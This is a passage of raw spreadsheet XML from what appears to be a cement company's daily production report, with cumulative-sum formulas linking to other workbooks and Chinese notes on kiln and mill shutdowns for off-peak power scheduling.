        <f>'[13]22'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'21'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]22'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]22'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]22'!$E$24</f>
        <v>4915</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'21'!H51</f>
        <v>86545.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1462944.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]22'!$I$24</f>
        <v>4025.42</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'21'!K51</f>
        <v>107253.199</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1470377.13</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]22'!$L$24</f>
        <v>27991.4849999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>62.2032999999996</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]22'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]22'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]22'!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'21'!U51</f>
        <v>3621.92</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>66620.391</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]22'!$V$30</f>
        <v>207.4</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'21'!X51</f>
        <v>3659.088</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>64275.325</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]22'!$Y$30</f>
        <v>3214.20600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]22'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]22'!$E$19</f>
        <v>4831.20000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'21'!H52</f>
        <v>10604.7300000004</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1394171.98</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]22'!$I$19</f>
        <v>4190.67</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'21'!K52</f>
        <v>81666.165</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1363360.365</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]22'!$L$19</f>
        <v>33985.0080000506</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>23.4379365517591</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'[13]22'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]22'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'21'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]22'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'21'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]22'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]22'!$M$21+'[14]22'!$M$22+'[14]22'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]22'!$N$21+'[14]22'!$N$22+'[14]22'!$N$35</f>
        <v>43.5</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'21'!U53</f>
        <v>967.55</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39301.977</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]22'!$Q$21+'[14]22'!$Q$22+'[14]22'!$Q$35</f>
        <v>0</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'21'!X53</f>
        <v>739</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40230</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]22'!$T$21+'[14]22'!$T$22+'[14]22'!$T$35</f>
        <v>1877.497</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]22'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'21'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]22'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'21'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]22'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]22'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]22'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]22'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'21'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]22'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'21'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]22'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]22'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'21'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]22'!$I$63</f>
        <v>196.469999999999</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'21'!K55</f>
        <v>5935.28</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>41370.93</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]22'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]22'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]22'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]22'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]22'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]22'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]22'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]22'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]22'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'21'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'21'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]22'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：10:00-22:10避峰停机。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G57+'21'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'21'!K57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G58+'21'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'21'!K58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G59+'21'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'21'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]22'!$Q$65</f>
        <v>窑:错峰续停。A组磨：8:00-24:00避峰停机。D1#磨：8:00-24:00避峰停机，D2#磨：8:00-24:00避峰停机。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G60+'21'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'21'!K60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'[14]22'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]22'!$E$6</f>
        <v>2138</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'21'!H61</f>
        <v>80651</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1196524</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]22'!$E$21</f>
        <v>3375.76</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'21'!K61</f>
        <v>86028.06</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1187188.14</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]22'!$H$6</f>
        <v>32392.1099999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>62.292519230769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'[14]22'!$M$11+'[14]22'!$M$12+'[14]22'!$M$13+'[14]22'!$M$14+'[14]22'!$M$15+'[14]22'!$M$16+'[14]22'!$M$17+'[14]22'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]22'!$N$11+'[14]22'!$N$12+'[14]22'!$N$13+'[14]22'!$N$14+'[14]22'!$N$15+'[14]22'!$N$16+'[14]22'!$N$17+'[14]22'!$N$18</f>
        <v>2211</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'21'!H62</f>
        <v>60836</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>896829.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]22'!$Q$11+'[14]22'!$Q$12+'[14]22'!$Q$13+'[14]22'!$Q$14+'[14]22'!$Q$15+'[14]22'!$Q$16+'[14]22'!$Q$17+'[14]22'!$Q$18</f>
        <v>1384</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'21'!K62</f>
        <v>57620</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>892092.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]22'!$T$11+'[14]22'!$T$12+'[14]22'!$T$13+'[14]22'!$T$14+'[14]22'!$T$15+'[14]22'!$T$16+'[14]22'!$T$17+'[14]22'!$T$18</f>
        <v>21670.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>86.6825359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]22'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]22'!$M$19+'[14]22'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]22'!$N$19+'[14]22'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'21'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]22'!$Q$19+'[14]22'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'21'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]22'!$T$19+'[14]22'!$T$20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G64+'21'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'21'!K64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G65+'21'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'21'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]22'!$Q$74</f>
        <v>1#窑:续停；2#窑:窑减产，窑尾托轮轴瓦磨合；1#磨:8:00-24:00避峰停机。2#磨:正常。3#磨:8:00-24:00避峰停机。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G66+'21'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'21'!K66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G67+'21'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'21'!K67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'[15]22'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]22'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'21'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]22'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'21'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]22'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]22'!$Q$77</f>
        <v>1#磨8:00-24:00避峰停机:16小时(避峰)。2#磨8:00-24:00避峰停机:16小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]22'!$D$43+'[15]22'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]22'!$E$43+'[15]22'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'21'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]22'!$H$43+'[15]22'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'21'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]22'!$K$43+'[15]22'!$K$44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'[15]22'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]22'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'21'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]22'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'21'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]22'!$K$45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G71+'21'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'21'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]22'!$Q$80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G72+'21'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'21'!K72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G73+'21'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'21'!K73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G74+'21'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'21'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]22'!$Q$83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G75+'21'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'21'!K75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G76+'21'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'21'!K76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G77+'21'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'21'!K77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G78+'21'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'21'!K78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'[16]22'!$E$7</f>
        <v>805.78</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'21'!H79</f>
        <v>11684.36</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>158812.83</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]22'!$I$7</f>
        <v>568</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'21'!K79</f>
        <v>10979.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>152870.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]22'!$L$7</f>
        <v>5589.64</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>11.17928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'[16]22'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'21'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]22'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'21'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]22'!$Y$15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G81+'21'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'21'!K81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G82+'21'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'21'!K82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G83+'21'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'21'!K83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G84+'21'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'21'!K84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G85+'21'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'21'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="F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23/30</f>
        <v>0.766666666666667</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46014</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24674.74</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'22'!H5</f>
        <v>479466.91</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6634332.94</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>24803.356</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'22'!K5</f>
        <v>530751.235</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6680822.366</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>216183.499</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>57.8030745989304</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]23'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]23'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]23'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]23'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]23'!$U$101</f>
        <v>41.841847826087</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]23'!$V$101</f>
        <v>63.1919467787115</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]23'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]23'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]23'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]23'!$D$23+'[11]23'!$D$17+'[12]23'!$D$17+'[13]23'!$D$25+'[14]23'!$D$8+'[14]23'!$D$15+'[15]23'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]23'!$E$23+'[11]23'!$E$17+'[12]23'!$E$17+'[13]23'!$E$25+'[14]23'!$E$8+'[14]23'!$E$15+'[15]23'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'22'!H6</f>
        <v>6590</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>282939.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]23'!$I$23+'[11]23'!$I$17+'[12]23'!$I$17+'[13]23'!$I$25+'[14]23'!$E$23+'[14]23'!$E$30+'[15]23'!$H$7</f>
        <v>1019.79</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'22'!K6</f>
        <v>16883.94</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>279081.64</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]23'!$L$23+'[11]23'!$L$17+'[12]23'!$L$17+'[13]23'!$L$25+'[14]23'!$H$23+'[14]23'!$H$30+'[15]23'!$K$7</f>
        <v>21818.9</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]23'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]23'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]23'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]23'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]23'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
